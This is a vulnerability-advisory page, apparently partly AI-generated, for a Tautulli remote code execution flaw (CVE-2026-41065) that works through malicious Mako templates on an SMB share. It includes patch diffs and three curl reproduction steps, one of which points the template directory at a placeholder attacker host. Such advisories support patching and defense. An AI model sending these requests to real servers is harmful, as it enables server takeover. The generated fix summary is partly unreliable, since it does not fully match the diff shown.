CVE-2026-41065
Description
Tautulli versions before 2.17.1 allow unauthenticated or admin RCE via a malicious Mako template on an SMB share.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Tautulli versions before 2.17.1 allow unauthenticated or admin RCE via a malicious Mako template on an SMB share.
Vulnerability
Tautulli versions prior to 2.17.1 are vulnerable to remote code execution through the newsletter custom template directory feature. This vulnerability exists due to missing authentication on fresh installs before the setup wizard is completed, and unsanitized input for the newsletter custom template directory. The affected versions are all versions prior to 2.17.1 [1].
Exploitation
An attacker can create a newsletter agent and configure the custom template directory to point to an attacker-controlled SMB share that hosts a malicious Mako template. By triggering the newsletter render endpoint, the attacker can achieve code execution. On a fresh install, this can be done without any credentials. On an already configured install, any administrator can be targeted [1].
Impact
Successful exploitation allows an attacker to execute arbitrary Python code on the target system with the privileges of the Tautulli process. This can lead to a full compromise of the affected server [1].
Mitigation
Version 2.17.1, released on 2026-05-04, addresses this vulnerability [2]. Users should update to version 2.17.1 or later. For custom newsletter templates and scripts, using mounted folders now requires manually enabling allow_mounted_folders = 1 in the config file [2].
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
1b24ff45af531Fix password newsletter auth
3 files changed · +7 −6
data/interfaces/default/newsletter_auth.html+1 −1 modified@@ -30,7 +30,7 @@ </div> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> - <form action="${uri}" method="post" id="newsletter-form"> + <form action="${uri}" method="get" id="newsletter-form"> <div class="form-group"> <label for="password" class="control-label"> Password
plexpy/webserve.py+2 −1 modified@@ -17,6 +17,7 @@ import base64 import csv +from hmac import compare_digest from io import open, BytesIO import json import linecache @@ -6837,7 +6838,7 @@ def newsletter(self, *args, **kwargs): elif plexpy.CONFIG.NEWSLETTER_AUTH == 1 and plexpy.CONFIG.NEWSLETTER_PASSWORD: if len(args) >= 2 and args[0] == 'image': return self.newsletter_auth(*args, **kwargs) - elif kwargs.pop('key', None) == plexpy.CONFIG.NEWSLETTER_PASSWORD: + elif compare_digest(kwargs.pop('key', ''), plexpy.CONFIG.NEWSLETTER_PASSWORD): return self.newsletter_auth(*args, **kwargs) else: return serve_template(template_name="newsletter_auth.html",
plexpy/webstart.py+4 −4 modified@@ -179,19 +179,19 @@ def initialize(options): }, '/api': { 'tools.auth_basic.on': False, - 'tools.sessions.on': False, + 'tools.sessions.on': True, }, '/status': { 'tools.auth_basic.on': False, - 'tools.sessions.on': False, + 'tools.sessions.on': True, }, '/newsletter': { 'tools.auth_basic.on': False, - 'tools.sessions.on': False, + 'tools.sessions.on': True, }, '/image': { 'tools.auth_basic.on': False, - 'tools.sessions.on': False, + 'tools.sessions.on': True, }, '/interfaces': { 'tools.staticdir.on': True,
Vulnerability mechanics
Root cause
"Missing authentication on fresh installs and unsanitized Mako template directory input allow for remote code execution."
Attack vector
On a fresh install before the setup wizard is completed, all management endpoints are unauthenticated. An attacker can create a newsletter agent, point the custom template directory to an attacker-controlled SMB share serving a malicious Mako template, and trigger execution via the newsletter render endpoint. On a completed install with credentials configured, the same chain is exploitable by any admin. The attacker hosts a malicious Mako template on an SMB share and crafts three requests to create the agent, set the custom template directory, and then render the newsletter to achieve code execution [ref_id=1].
Affected code
The vulnerability stems from `plexpy/webstart.py` which disables authentication on fresh installs, `plexpy/newsletters.py` where `NEWSLETTER_CUSTOM_DIR` is unsanitized and passed to `TemplateLookup`, and `plexpy/webserve.py` which lacks a `FIRST_RUN_COMPLETE` check on relevant endpoints [ref_id=1].
What the fix does
The patch enforces session authentication for the newsletter endpoint, preventing unauthenticated access. It also strengthens the password comparison for newsletter authentication using `compare_digest` and modifies the newsletter form submission to use GET instead of POST, addressing the authentication and template rendering vulnerabilities [patch_id=4820255].
Preconditions
- configTautulli must be installed and running.
- authOn a fresh install, no authentication is required. On a completed install, administrative privileges are required.
- networkThe attacker must be able to reach the Tautulli instance over the network.
- inputThe attacker must control an SMB share serving a malicious Mako template.
Reproduction
Attacker hosts a malicious Mako template on an SMB share. 1. Create a newsletter agent: `curl -s -X POST "http://TARGET:8181/add_newsletter_config" -d "agent_id=0"` 2. Set the custom template directory to the attacker's SMB share: `curl -s -X POST "http://TARGET:8181/configUpdate" -d "newsletter_custom_dir=\\ATTACKER_IP\share"` 3. Render the newsletter using the returned newsletter_id: `curl -s "http://TARGET:8181/real_newsletter?newsletter_id=X"` [ref_id=1]
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.